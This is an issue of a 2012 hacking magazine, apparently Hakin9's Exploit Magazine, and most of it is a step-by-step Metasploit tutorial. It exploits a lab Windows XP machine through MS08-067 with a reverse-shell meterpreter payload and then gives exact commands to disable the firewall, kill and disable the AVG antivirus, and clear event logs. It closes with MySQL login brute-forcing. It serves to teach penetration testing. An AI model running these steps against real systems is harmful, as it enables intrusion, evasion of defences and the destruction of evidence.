Atola Insight

Thats all you need for data recovery.

Atola Technology offers Atola Insight the only data recovery device that covers the entire data recovery process: in-depth HDD diagnostics, firmware recovery, HDD duplication, and file recovery. It is like a whole data recovery Lab in one Tool. This product is the best choice for seasoned professionals as well as start-up data recovery companies.

Case management Real time current monitor Firmware area backup system Serial port and power control Write protection switch

Get trained today through our exclusive 7-months hands-on course. Gain access to our complex LAB environment exploiting vulnerabilities across many platforms. Receive a trainer dedicated to you during the 7 months. 10 different hands-on engagements, 2 different certifications levels.

MONTH 1

Vulnerability Assessment - level 1 Vulnerability Assessment - level 2 Vulnerability Assessment - level 3 Network Penetration Testing - level 1 Network Penetration Testing - level 2

MONTH 2

MONTH 3

Network Penetration Testing - level 3

MONTH 4

Web Application Penetration Testing - level 1 Web Application Penetration Testing - level 2

MONTH 5

Web Application Penetration Testing - level 3

MONTH 6

Certification Exam 1 - Certified Cyber 51 Pentesting Professional - (CC51PP)

MONTH 7

Certification Exam 2 - Certified Cyber 51 Pentesting Expert - (CC51PE)

EDITORS NOTe

Dear All,

team
Editor in Chief: Grzegorz Tabaka [email protected] Managing Editor: Micha Winiewski [email protected] Editorial Advisory Board: Rebecca Wynn, Matt Jonkman, Donald Iverson, Michael Munt, Gary S. Milefsky, Julian Evans, Aby Rao Proofreaders: Michael Munt, Rebecca Wynn, Elliott Bujan, Bob Folden, Steve Hodge, Jonathan Edwards, Steven Atcheson, Robert Wood Top Betatesters: Nick Baronian, Rebecca Wynn, Rodrigo Rubira Branco, Chris Brereton, Gerardo Iglesias Galvan, Jeff rey Smith, Robert Wood, Nana Onumah, Rissone Ruggero, Inaki Rodriguez Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a The Exploit Magazine. Senior Consultant/Publisher: Pawe Marciniak CEO: Ewa Dudzic [email protected] Production Director: Andrzej Kuca [email protected] DTP: Ireneusz Pogroszewski Art Director: Ireneusz Pogroszewski [email protected] Publisher: Software Press Sp. z o.o. SK 02-682 Warszawa, ul. Bokserska 1 Phone: 1 917 338 3631 www.hakin9.org/en

If you are reading this, I presume that you trusted us and reached for the Exploitmag. Thank you for that. As you may see, we launched entirely new project that targets all types of exploits hence the name. This month, we host Abhinav Das and Sudhanshu Chauhan, who will expatiate on Metasploit. I genuinely hope that you will like our content and spread the word about us, so we can write for the wider public. In the nearest future, you can expect issues on: DoS Attacks, Security flaws on WSDL, SOAP. The hidden catch is that those issues will also be for free. Do not hesitate and subscribe to our magazine. In case you have any: questions, suggestions, doubts please, reach me at: [email protected] for more details.

Kindest Regards

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them. To create graphs and diagrams we used program by

Mathematical formulas created by Design Science MathType

DISCLAIMER!

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

Metasploit Demystified Introduction to the Metasploit Framework

By Abhinav Das www.abhinavdas.in; @theabhinavdas

Have you ever wondered, have you ever given it a thought that your IP (Internet Protocol) address is a very important identification of your computer and that could actually put you, your sensitive data and your computer at risk to attack?

id you know or even dream that somebody can gain Administrator level access on your computer through the Internet with just your IP address? Did you know that just because you didn't update your Flash version the last time it prompted you to, you make your computer vulnerable to attack and exploitation? Just because you clicked the 'Remind-me-later' button the last time Flash player asked you to update it, you set your computer at risk of being hacked? Yes, it is possible. And with the current level of technology and certain neat tools, it is very easy as well. Anybody who reads, understands and tries out what is in this issue of Hakin9, can do it. They can own somebody's Windows XP box remotely by running an exploit on it, through the Internet. After that, the rest is in their hands, depending on what kind of damage they wish to do. They may just decide to wipe out your operating system, they might decide to print tons of smiley's on important office work, or they might just set up a keylogger/RAT (Remote Administration Tool) which records your keystrokes and sends them to a remote FTP server. Yes, this is very much possible, and hence, it becomes very important to know how to conduct such an attack, so as to have a chance of blocking it. During my visits to various colleges and institutions to deliver my seminars and workshops, I get
6

bombarded by lots of questions. Amongst these questions is one, which is something, any penetration tester/ethical hacker should know How many stages or phases does a pentest have? This question obviously can have multiple answers based on who the pentester is, what his objectives are and other criteria. But, most of my hacker pals and I agree that there are 5 stages/phases for a successful and good hack. They are: Reconnaissance Scanning Gaining access (Exploitation) Maintaining access Covering tracks

Of the above mentioned stages, this issue of Hakin9 will concentrate on the third stage of a successful hack/penetration test Exploitation. Exploitation is the process of manipulating the behavior of software or applications to make them behave in an unpredictable fashion which was not intended by the developers. Exploitation is usually done through bugs/glitches/vulnerabilities in software or applications. Hackers who are specialized in the art of exploit-writing and exploit-development can find bugs in software and applications and write exploits for existing bugs. These exploits may be

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

used by other hackers to gain various privileges on a remote target machine (Figure 1). The Metasploit Framework, referred to as msf in later parts of this issue is a part of the Metasploit Project. The Metasploit Framework, in all its simplicity is a framework consisting of a large number of community written exploits which are updated from time to time. Metasploit provides an easy to use, easy to maintain, easy to code exploit development environment. It is so simple to use, it is a must-have for newbie hackers. Metasploit also currently has a GUI which makes using it, all the more simpler. Metasploit was originally written in Perl, but has been completely rewritten into Ruby. It has been created by HD Moore, and has been sold to a security company Rapid7 in 2009. In 2011, Rapid7 introduced and released a free community version of the product Metasploit Community Edition, which is a free web-based interface for Metasploit. There are many other versions of the Metasploit Framework Metasploit Express and Metasploit Pro. Metasploit Pro is the best amongst these. However, it is commercial, and the free version is a 7-day trial. If you are into the field of computer/network security, there must be a point of time where you have heard of or even used the Metasploit Framework.

It is a must have for most penetration testers as it makes our jobs easier. For those of you that have just heard about the Metasploit Framework but didn't find it very useful, I'll be talking about it, in the next few pages and drawing up many of its uses which will amaze you (for sure) and get you more interested in computer security. The Metasploit Framework comes in many different forms. But the most widely used are the msfconsole and Armitage (its graphical interface). For those that are not very comfortable with the CLI, Metasploit now ships with a new GUI Armitage. Armitage does one thing for sure, it makes the job of pentration testing very easy by adding a GUI to the Metasploit Framework. The ability to combine any exploit with any payload, hence giving an environment which is extremely flexible and easy to use. That is one of the best features of Metasploit. The great thing about Metasploit, which makes it different from a lot of other amazing tools, is that it can run on almost any platform. It runs on all versions of Unix (including Linux and Mac OS X). Apart from *nix environments, Metasploit also runs on Windows! Before going into the first example use and demo of the Metasploit Framework, its usage, I would like to talk about three things which have to be clear to every aspiring hacker and penetration tester.

Figure 1. Metasploit Framework Logo

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

Vulnerability Exploit Payload

tive operation, and takes advantage of a vulnerability. After understanding these terms, it might be useful to give you the basic steps of exploiting using the Metasploit Framework, just to demonstrate that it is really easy to use Metasploit. Metasploit is as close as it comes to having a point, click and exploit interface. Choose and configure an exploit. Check if target is vulnerable/susceptible to the chosen exploit. Choose and configure a payload. Executing the payload. Note Optionally, some people perform a step between 3 and 4, which can be called 3.5, which is, to encode the payload so that an IPS (Intrusion Prevention System)/IDS (Intrusion Detection System) will not be able to catch the payload. Now, lets get to the interesting part. Whenever you try to learn a foreign language, you learn it, by starting to speak it, starting to use it. The same applies to the technology world and technology-related things and subjects. You have to start using them, applying them in real life scenar-

What is a Vulnerability?

Vulnerabilities are side-effects which are a result of programming flaws/design flaws/implementation flaws. Most common are vulnerabilities that are created due to programming flaws. Vulnerabilities are weaknesses which are caused due to any or many of the mentioned reasons. Vulnerabilities leave a system open to exploitation by hackers. They are loop-holes that give an attacker access into your computer.

What is an Exploit?

An Exploit is a sequence of commands/code which take advantage of a vulnerability to cause unexpected behavior, which is not planned by the person that designed and coded the software/system. This is, obviously, the definition of exploit as a noun, not a verb. The verb form of exploit would mean, putting an exploit in action and actually exploiting the system.

What is Payload?

Simply defined, payload is the part of malicious code or an exploit that actually performs a destruc-

Figure 2. BackTrack 5 Login Prompt

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

ios to actually become good with them. Hence, at this stage of the tutorial, I would like to walk you through an actual exploitation, so you know how to run and use Metasploit. I usually suggest people to use Linux while trying to hack, the environment is amazing and makes everything very easy to do. The current demo will be on a Linux environment, if you dont already know Linux, dont panic! Just do everything, step-by-step, as written, and youll be fine. Lot of people wonder what OS to use, what OS to start off with. There are many free Linux distributions available for immediate download as ISOs. Great thing about ISOs are that you can either use them in a virtual machine or you can burn them onto a DVD, making a Live-DVD or you can use a tool like Unetbootin to make a bootable pendrive with that ISO. The current most preferred Linux distribution, used for penetration testing is BackTrack 5. BackTrack 5 is a Linux distribution based on the Debian GNU

distro. It is used for digital forensics and penetration testing mainly because of the numerous tools that if has, all pre-installed and pre-set-up, ready to use. You may not use all of the tools on BackTrack 5 but you sure will use some. I personally suggest getting BackTrack 5 due to its ease of use. It also has the Metasploit Framework pre-installed. The latest version of BackTrack BackTrack 5, comes in many flavours. It can be downloaded from http://www.backtrack-linux.org/downloads/. Now, there are two options with the BackTrack 5 GNOME 32-bit version. You can choose to download it as an ISO or as a VMWare Image. Downloading it as an ISO will give you multiple usages, as I have mentioned above. But if youre planning on using BackTrack 5 as a Virtual Machine, running over your existing OS, I suggest downloading the VMWare Image. This image has VMWare-Tools pre-installed hence, easing up the installation process for you. Now, you can use VMWare Player or VMWare Workstation to run BackTrack 5. I person-

Figure 3. Logging into the Graphical Interface using the startx command

Figure 4. Navigating to the Metasploit menu on BT5 32-bit GNOME

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

ally prfer and suggest the VMWare Workstation. It is an amazing software, very nice, very clean, extremely easy to use. So, let me jot down the steps to download and run BackTrack 5: Download the BackTrack 5 ISO/VMWare Image from http://www.backtrack-linux.org/downloads/. Download Unetbootin, if you want to create a bootable usb-stick. Download VMWare Player/VMWare Workstation if you want to run BackTrack 5 as a Virtual Machine. If you want to create Live Usb Install, follow the steps mentioned here http://www.backtracklinux.org/tutorials/usb-live-install/. If you want to use the VMWare Image, just extract the contents of the file that you downloaded to any directory. You will find a .vmx file. Double click it, it should open in the virtualzation software that you downloaded. Run the Virtual Machine/Reboot into the Live USB. Congratulations, your attacker system is ready. Note Running a Live USB has a disadvantage, which is, that you would now require another computer on the local network running the target box specifications. If you use Virtualization software like VMWare Workstation, then you can have the target OS running as another virtual machine inside VMWare Workstation, and both attacker and target operating systems will be on top of your host operating system. I prefer it that way, but you can do what you feel comfortable doing.

If you have setup everything as instructed, you will have booted into BackTrack 5 either as a Virtual Machine or as a Live USB. Now, you should see a lot of text appearing on a Command Line Interface (CLI) on the screen, to show that BackTrack is booting. Wait for the login prompt, which looks like this: Figure 2. You should see something similar to the above picture. When you are prompted to enter the login details, you should enter root and toor as the username and password respectively. After logging in, you should see something like the screen below. To start X Windows, type startx as shown Figure 3. After booting into BackTrack 5, you would need to navigate to the Metasploit Framework menu. Im currently using a BackTrack 5 32-bit GNOME VMWare Image on VMWare Workstation. Here, you need to navigate to Applications > BackTrack > Exploitation Tools > Network Exploitation > Metasploit Framework (Figure 4). Here, youll have four options (1) Armitage (2) msfcli (3) msfconsole (4) msfupdate. You can select option (3) msfconsole from the menu. Another way of accessing the Metasploit Framework is by opening up a terminal and typing /pentest/exploits/framework3/msfconsole. Either way, you should see something like this (Figure 5). Now, if you are uncomfortable with using a command line interface, Metasploit now ships with Armitage a GUI for Metasploit. You can access Armitage through the menus, as I have shown and select (1) Armitage, or you can start it from the command line. Armitage can be started by opening the terminal and typing /pentest/exploits/framework3/ armitage.

Figure 5. msfconsole

10

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

Note You should have an instance of Metasploit already running. If you do, click Connect. If you do not already have Metasploit running, click Start MSF, which starts the Metasploit service and also connect Armitage to it. Once Armitage is up and running, you should have something like this: Figure 6. Good, youre done setting up the attacker machine. Now, its time to set up the target machine. For the target machine, I would like you to setup Windows XP SP2 to test against. It will be a very interesting and fun exercise if you can setup Windows XP SP2 on your Virtualization Software. Most people would have a Windows XP CD lying around somewhere, if you dont, you can always download

either the ISO or the VMWare Image from torrents and other places. Also, if you cant find the right file to download, a lot of people suggest downloading it from here http://nvd.nist.gov/fdcc/index.cfm. Note If you download it from NIST, you will have to remove all the patches that are installed in the VM. You can extract the contents and run it. The username / password scheme for the image is Renamed_Admin / P@ssw0rd123456. I wont include any screenshots for this process though. This is something that is easily googleable. And most of you should know how to install Windows XP on your machine, so that shouldnt be much of a problem.

Figure 6. The Armitage interface

Figure 7.

THe eXPLOIT MAGAZINe AUGUST 2012

11

MeTASPLOIT

Windows XP Post Install: Turn Windows Firewall Off. Turn off Windows updates. Open Security Center, select Change the way Security Center alerts me, and deselect all. In the control panel, go to Tools, then Folder Options. Select the View tab, scroll to the bottom and un-check the box next to Use simple file sharing. Save changes by clicking Ok. Now, some people tend to wonder and often ask me, Why did we setup Windows XP SP 2? I say, Lets start with something easy, just to break the ice. Once you are used to Metasploit and are familiar with whole process of exploitation using Metasploit, everything else should automatically fall in place and become very easy for you to do. So, lets start the attack. Power up both your BackTrack 5 Virtual Machine and your Windows XP SP2 Virtual Machine and lets get started.

scan from your attacker machine BackTrack 5. To do this, open a terminal and type nmap -v -n <ip_ address> (replace <ip_address> with the IP Address of your Windows XP machine). So, in this case, I would run nmap -v -n 192.168.0.101. You will find some services running. We already know what services will be running, so, we dont need to bother much about the output of that scan. Something that would concern us more is the version of the software running on those ports. For this, we can use the -sV flag on Nmap. So, the scan becomes nmap -sV -n <ip_address>.

Step 3

We already know what vulnerability exists on the Windows XP SP2 machine, so we will directly go to Metasploit and go through the process of running the exploit.

Step 4

Step 1

Find out the local IP address of the target/victim machine which is the Windows XP machine. You can do this by going to the Windows XP Virtual Machine, opening up command prompt and doing ipconfig. That should give you something like this: Figure 7.

We know that the exploit to be used. We shall be using the exploit/windows/smb/ms08_067_netapi exploit. We can do this by opening up msfconsole and typing use exploit/windows/smb/ms08_067_netapi. After that, you should get something like this: Figure 8. So, currently, you are using the exploit called ms08_067_netapi which Windows XP SP2 machines are vulnerable to. Next, you will have to select and set what payload you want to use. There are many payloads available for this exploit.

Step 5

Step 2

You found the local IP address of you Windows XP Machine. What you now have to do is run an nmap

Figure 8. use exploit/windows/ms08_067_netapi

12

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

Figure 9. Setting the payload if the exploit is successful

Figure 10. Show options

THe eXPLOIT MAGAZINe AUGUST 2012

13

MeTASPLOIT

Note I already know what exploit Windows XP SP2 machines are vulnerable to, hence, I directly used the ms08_067_netapi exploit. But, in normal, real-life situations, it is not so easy. You would need to use command such as search in the MSF console to find exploit related to the services that the remote target is running. Once you find an exploit, you can use it by following the same steps. I repeat, I know for sure that Win XP SP2 is vulnerable to this exploit, and have thus used it. Do not try attacking an Apache machine with this exploit and ask me Why isnt it working? If you are using an Apache box as a target, you can do a search on the MSFConsole to find exploits that might work on the Apache server. Another important thing is the version numbers of the services that are running on the victim. To find the version number of the target box, you will need to run a port-scan on it. There are multiple tools to do this, I have demonstrated the use of one such tool called nmap earlier in this demonstraton. There are various other tools to perform network mapping. You can see which one suits you the best, and use that. But, nmap is considered the most powerful network mapping tool, by industry standards. We will be using the reverse_tcp payload by issuing the following command set PAYLOADwindows/ meterpreter/reverse_tcp. Now, we get something like this: Figure 9.

Step 7 The worst is over! If you found that difficult, knock youself out with a trout. Now, all that is remaining for you to do is set the RHOST and LHOST. RHOST is the IP Address of the target machine (which we found in step 1) and LHOST is the IP Address of the attacker (you can find that by doing ifconfig on your BackTrack machine by opening another terminal. To set RHOST, you just need to type set RHOST <ip_address_of_ target> and to set LHOST, you need to type set LHOST <ip_address_of_attacker>. After that, you should get something like this: Figure 11. Now, the last thing you need to do, is type exploit. If you set up everything correctly, and didnt make any mistakes on setting RHOST and LHOST, you should be able to successfully exploit your Windows XP SP2 Machine. After a few lines, you should see the meterpreter> prompt. This shows that youve successfully hacked the remote machine and that your payload has successfully run. You can run pc command to list the processes on the remote victim machine. You can view processes, kill processes, and do whatever you like to the target. I personally prefer doing a shutdown -s -t 0.

Figure 8

Back to the Basics

Step 6

Now, we have completed setting the payload. You can check the awailable options by doing show options. Like thus: Figure 10.

Now that you have some idea of how simple it is to use and run exploits using the Metasploit Framework, and now that you have tasted the simplicity and ease of running exploits, let us go back to the basics of Metasploit. We will discuss finer details of the Framework and talk about its various parts and their functions in a bit more detail.

Figure 11. Setting RHOST and LHOST

14

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

We will revisit the msfconsole, exploits, payloads and the meterpreter. We will talk about what they are, how they work and obviously, how to use them.

Msfconsole

Undoubtedly, the most popular MSF interface is the msfconsole. It acts as a centralised console and though it may seem intimidating at fist, is the best MSF interface to use. The reason it looks intimidating and scary is the obvious fact that you dont know the commands and dont have GUI to help you (Figure 12). There are various benefits of the msfconsole: Execution of external commands (Yes, you can use external commands!) Is very stable and contains maximum features. Is a simple and clean way to access features of the Framework owing to full readline support, command completion and other things. Launching (can be done in multiple ways): Navigating to msfconsole through the menu. Usually Applications > BackTrack > Exploitation Tools > Network Exploitation > Metasploit Framework. Opening terminal and running msfconsole. Msfconsole is also located in /opt/framework3/msf3/ and /pentest/exploits/framework3/. Note By running msfconsole -h or msfconsole can get various other options.
--help

Due to the wide array of exploits out there, and the obvious difficulty to memorize the location of each and every exploit, the Metasploit Framework has been kind enough to intoduce Tab Completion. As you know, in any shell, entering what you know and pressing Tab will present you a list of options available for you to chose from, and when there is only a single option, it will auto-complete the string. MSF incorporated tab completion into almost all of its commands to help users navigate though it, from the CLI. Some examples of tab completion as taken from the Offensive Security website are: use exploit/windows/dce use *.netapi.* set LHOST show set TARGET exp

Exploits

All of the exploits which are in the Metasploit Framework fall under two categories depending on how they work, and how they exploit, or rather, who they exploit. These two classifications are: Active exploits Passive exploits Active Exploits These exploits attack specific targets or hosts. They attack based on the host that the attacker sets. The RHOST variable tells the MSF who to at-

you

Figure 12. Msfconsole

THe eXPLOIT MAGAZINe AUGUST 2012

15

MeTASPLOIT

tack. The exploit attacks only that particular host and runs until completion and exits. Note You can always send an active exploit to the background by passing the -j flag. Thus, after configuring the exploit, doing exploit -j will force the active module to the background. A problem with active exploits is that they stop execution whenever an error is encountered (Figure 13).

This is an example of an active exploit which uses a set of previously gathered user credentials (Figure 14). Passive Exploits These exploits wait patiently for a victim to connect. In short, they exploit incoming hosts that connect to the attacker machine. Passive exploits usually focus on clients including web browsers and FTP clients. They can be used with email exploits to wait for connections and exploit any incoming host. They

Figure 13. Using exploit -j

Figure 14. Example exploit

Figure 15.

Figure 16. Passive exploit of Cursor vulnerability

16

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

do not attack a particular target but exploit anybody that makes a connection to the attacking machine (Figure 15). An example taken from the Offensive Security website is the use of the animated cursor vulnerability which doesnt fire till a victim accesses a malicious website (Figure 16).

Payloads

As we have already discussed, payloads are code that are executed after and exploit successfully completes. Payloads are an interesting part of exploitation. Exploitation is only till you get into a system, but payloads are a part of post exploitation. Payloads on MSF are of three types: Singles Stagers Stage Singles These are stand-alone payloads. They are the simplest to use. They could do anything from creating a new user on the target machine or just opening up the Calculator. Stagers These type of payloads are more commonly used, since they give more flexibility during after exploitation. Stagers create a network connection between the attacker and the victim machines. Stage Stages are parts of a payload that are downloaded by Stager modules. The reason that Stages exist is because Stargers have size constraints. But once a Stager completes its run, it can download any of various Stages with no size limits, such as, a meterpreter, VNC injunction, Iphone ipwn shell etc.

stager socket and establishes an excellent clientside Ruby API. The Meterpreter is extremely stealthy and lowprofile in a sense. This is mainly because it resides entirely in the target machines memory and is never written to the disk. Meterpreter injects itself into compromised processes running on the target machine which is another great aspect since it allows the Meterpreter to infect and migrate to other processes with ease. Apart from all this, the Meterpreter uses encrypted communication by default. The Meterpreter is designed to leave as less information or evidence on the compromised target host as possible. Meterpreter can be extended and new features can be added to it, without having to rebuild it completely. Features can be added to the Meterpreter by loading extensions. The process of extending it is very simple and seamless and takes minimal time to complete. Some basic Meterpreter commands are:
Function Shows the available commands and their uses as a help menu. background Sends the current meterpreter session to the background and returns you to the msf prompt. getuid Used to retrieve the UID (User ID) that Meterpreter server is running as on the host. ls Used to list the files in the cwd (current working directory). download Downloads a file from the remote machine. upload Uploads a file to the remote machine. execute Used to execute a command on the remote target machine. shell Use to invoke a standalone shell on the target machine. idletime Displays the amount of time that the remote user has been idle. hashdump Dumps contents of the SAM file/database. ps Displays a list of running processes on the victims machine. Command help

Metasploit Meterpreter

Now that you know what exploits and payloads are, and since we have discussed the various types of payloads, it becomes easier to understand what the Metasploit Meterpreter is. It is a payload, which uses DLL injection stagers. It communicates over the

Now that you have understood the Meterpreter and know some of the basic commands, it is time to see what can be done to a remote target in a

Figure 17. Meterpreter session is running

THe eXPLOIT MAGAZINe AUGUST 2012

17

MeTASPLOIT

Figure 18. Getting a remote shell

real life scenario. If we get into a system that we want to attack, I doubt we will try to shut it down, or open up an instance of the Calculator application. We would want to do something more.

How to remain hidden (Ninja techniques to apply, post-exploitation)

We have discussed various things, we have gone through the procedure of attacking a remote host using MSF. We have configured the exploit, and used it. You have been introduced to various types of exploits and payloads. You have also been told about the Meterpreter, its uses, some simple commands and what it can do. Now, we move on, to another interesting part of hacking, which is important for all serious hackers and pentesters to know. It is generally called covering your tracks. That is, the ability to hack and work, undetected. Firewalls and Anti-viruses pose a threat to hackers. Firewalls, if properly configured, can block an attack quite efficiently. Antiviruses can detect your activities and create hurdles.

So, we have covered exploitation and gaining access to a remote host running the Windows XP SP2 operating system. Now, we shall cover another important part of that attack, which is, disabling firewalls and killing anti-viruses. For this demonstration, we will use the Windows Firewall and AVG 2012 as the anti-virus. We left off the last demonstration at the Meterpreter session. You can understand that the exploit was successful and that you are in a meterpreter session by looking for the meterpreter> prompt (Figure 17). The above image shows that we have successfully exploited the target, and that a Meterpreter session has started. If you recall the simple Meterpreter commands that I have tabulated earlier, you will remember the command shell. It is used to get a shell on the remote system. So let us run the shell command at the Meterpreter prompt. On doing so, we get something like this: Figure 18. Now, we have a remote shell on the victim computer. The next step, would obviously be checking if the target system has its Firewall running. Now that we have a shell on the target computer, we can easily verify whether its Firewall is running using the command netsh firewall show opmode. That should give you something like this: Figure 19. On looking at the output of the command, we can easily understand that the firewall is enabled. The next step is a no-brainer. We would like to disable the Firewall. Disabling the firewall is easy from the

Figure 19. Checking if Firewall is running on target

Figure 20. Disabling the firewall

18

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

Figure 21. Firewall is successfully disabled

Figure 22. Running Meterpreters killav script

shell, hence, were not going to exit the shell and return to our Meterpreter session just yet. The command that can be used to disable the firewall is netsh firewall set opmode mode=disable. This com-

mand, when run from the shell on the remote host, will disable the Firewall. So, you must run the command (Figure 20). The Ok. at the end of the ouput details tells you that the command you have run has completed successfully. That is a very good sign. Sometimes, you might not have the Administrator privilege on the box, and you might need to perform some privilege escalation to get a shell with Administrator rights. But again, the process is the same, and running the above command will surely disable the Windows Firewall. This screen-shot, taken on the target machine shows that the Windows Firewall has been successfully disabled (Figure 21). Great! So, the Firewall has been disabled. That is one guard down for the target machine. Now, we can proceed to disabling and killing the anti-viruses running on the target box. For now, we can exit the remote shell, and go back to the meterpreter session by using the exit command. Luckily, killing anti-viruses isnt as tough to do as it was a long time ago. Meterpreter has a custom script that makes that job very easy. All you have to do is use the command run killav. Killav is the name of the script which probably is an abbreviation for Kill Anti-viruses. This automates the process of killing an anti-virus, so, run the command, sit back, and wait for it to complete (Figure 22). Now, youll see a list of processes that have been killed by the killav script. If you look at the output, youll notice that it killed a process called avgrsx. exe. But did it really kill the anti-virus? You can have

Figure 23. Output of the tasklist command

THe eXPLOIT MAGAZINe AUGUST 2012

19

MeTASPLOIT

a look at the source-code of the killav script to understand what it actually does. You will see that the script has a list of process names, which it matches,

to the processes running on the target machine and kills them. So, now comes the big question, was the AVG anti-virus really killed?

Figure 24. Categorizing tasklist output

Figure 25. Shortlisting tasklist output

Figure 26. Process info

20

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

For understanding this, we would need to revisit the remote host by opening a shell on it. To do that, run the command shell. Now, to get a list of processes running on the machine, you can run the

command tasklist. On running the command, you will get output that looks a lot like this: Figure 23. In the output created by running the tasklist command, you will notice process names starting with avg. So that means, the killav script, didnt really kill the antivirus. If you want to see what service the processes belong to, you can run tasklist /svc. This gives the same list of process, with the service that they run. You should get something like this: Figure 24. This is only to categorize the tasklist. Figure 27. Disabling the main AV processes from auto-starting at boot-time Now, since we are only interested in the avg tasks that are running, we can run the command tasklist / svc | find /I avg. This tells the target computer to list processes running whose names start with avg. Now, you should get a shorter list that looks like this: Figure 25. Now, after some trial and error, we notice that the avgwd service and the Figure 28. Main avg processes not running avgidsagent service keep restarting the other processes even if we kill them. This tells us that these are the two main processes and the most suspicious. Anti-virus companies usually tend to start so many processes so as to confuse the attacker on which is the main process that controls the rest. Let Figure 29. Kill remaining avg processes us now, take a closer look at avgwd and avgidsagent. We can do this by running the command sc queryex <process>, like shown below: Figure 26. If you notice in the output of the process description of both these proFigure 30. Using the clearev script cesses, you will see, written, NOT_ STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN. That tells us, that the processes cannot be stopped or paused.That is a drawback, yes, but also gives us a hint on what should be our course of action. So now, we will try to disable the processes from auto-starting at reboot, so that they will not start when we reboot the host machine. We can do that by using the command sc config <process> start=disabled. You should do that for both the processes avgwd and avgidsagent (Figure 27). Now, the next step, is debatable, and is not very neat. There are multiple options for us right now, we can reboot the system or wait for the user to reboot the system. Since this is just a tutorial on disabling the firewall and antiFigure 31. Proof that clearev worked virus, and since it is not a real pentest,
21

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

Im going to go ahead with the bad route, which I suggest none of you take Ill reboot the system. You can do this by giving the command shutdown -r -t 0 or you can exit the shell, come back to your meterpreter session and use the command reboot. Now, wait for the computer to reboot. After it has, examine the system for any avg processes that are running using the command tasklist /svc | find /I avg. You should see this: Figure 28. There are now only three processes running instead of five. The two processes that we disabled are not running, that means we can kill these three processes without any problem. To do that, we can use taskkill /F /IM avg. This command kills processes that are running whose name has avg (Figure 29). Congratulations. You have successfully disabled the Firewall and killed the Anti-virus. Now, you can continue doing whatever you like, without the fear of interruption from either. Note A lot of hackers like to automate this whole process and write scripts with commands. Scripts that can be run with certain flags. They code them as extensions to the meterpreter. If you are good at coding, you can give that a shot as well.

Another thing, that some people like to do, which I always suggest you do, after you finish whatever you need to on the target machine is clearing logs. Again, MSF helps us with this, since it has a built-in script called clearev which clears all the system log files. You can use that, by exiting the shell, and going back to the meterpreter session. Run the clearev script (Figure 30). The next screen-shot has been taken on the target machine after running the clearev script (Figure 31).

MySQL Injection through Metasploit

We have seen how to exploit a vulnerability on a remote system. We have seen how to gain access on it remotely using MSF. We have also see how we can disable the Firewall and Anti-virus running on a system using MSF. Now, we shall move to another interesting area. We will attack databases with the Metasploit Framework. I thought that this could be the last demonstration for this issue on using the Metasploit Framework, but it will definitely be a very useful demonstration since MySQL is very common on the internet today, more common than Oracle. In most of the penetration tests that I have done for my clients, I have found at least one system run-

Figure 32. Using auxiliary/scanner/mysql/mysql_version modulew

Figure 33. Running the version check and discovering the MySQL server version

22

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

ning a MySQL server. Im sure that most of you face similar situations. In this demonstration I will show you how you can attack a MySQL database using MSF. I suggest running a Linux operating system with the MySQL server, and setting that up on your Virtual Machine. Its really not difficult to do, you just need to download the right files from the right places and set them up. Setting up the MySQL server isnt really in the scope of this article. Here, Im going to try and concentrate on attacking the setup. You can probably find some nice tutorials on setting up the MySQL server using Google. So, after setting up the MySQL Server on a Virtual Machine and starting the services required. You would need to find the IP address of the target machine using ifconfig. Now, before we even begin our attack, we should find out more about the MySQL Server running on the target box. Knowing versions of a service running on the target always helps since it allows us to find multiple vulnerabilities and sometimes, even 0days on that particular version of software. So, we can do this by loading a MSF module using the command use auxiliary/ scanner/mysql/mysql_version (Figure 32). Now, the only thing we need is the remote IP address (IP address of target machine) to execute this module to find the MySQL server version. This, we have already found. If you havent, you can find it. After you do, you must set the RHOST value as the target IP address and then execute it by using the command run, as follows: Figure 33.

Figure 36. Configuring the mysql_enum module

Looking at the output, we can easily figure out that the target box is running MySQL 5.0.51a-3ubuntu5 (protocol 10). This information is very useful to us, as we can find exploits for it, using simple Google searches. Now, you might be thinking, Ok, lets Google for exploit for the MySQL version and pwn this box!! No, I suggest one step before that. Try running a script that checks if the server is using default username-password combinations. A lot of server administrators forget to put passwords on default accounts and that just makes our job easier. So, Im going to run a scan for that. This is a kind of brute-force against the MySQL server. What you are basically doing is brute-forcing the logins. Luckily, MSF offers a module for that! This module is called mysql_login. You can use this module by running the command use auxiliary/scanner/mysql/ mysql_login. The mysql_login module can be used in conjugation with your word-lists in order to discover at least one valid database account. This checks the MySQL database for weak credentials and is a good practice. There are three variables that you need to set RHOST, USER_FILE and PASS_FILE. USER_FILE contains possible usernames. PASS_FILE contains a list

Figure 34. Setting the variables and running

Figure 35. Running the mysql_login module

THe eXPLOIT MAGAZINe AUGUST 2012

23

MeTASPLOIT

Figure 40. Figure 37.

of passwords. These two files can be text files (.txt) or list files (.lst), with full path as shown: Figure 34. You can run the module with the run command as shown above. After looking at the output of the scanner, you will see that the scanner has been successful (unless of course, you have added strong passwords to the guest and root accounts. This is a demonstration, hence, Ill not be going into the process of bruteforcing username and password combinations.

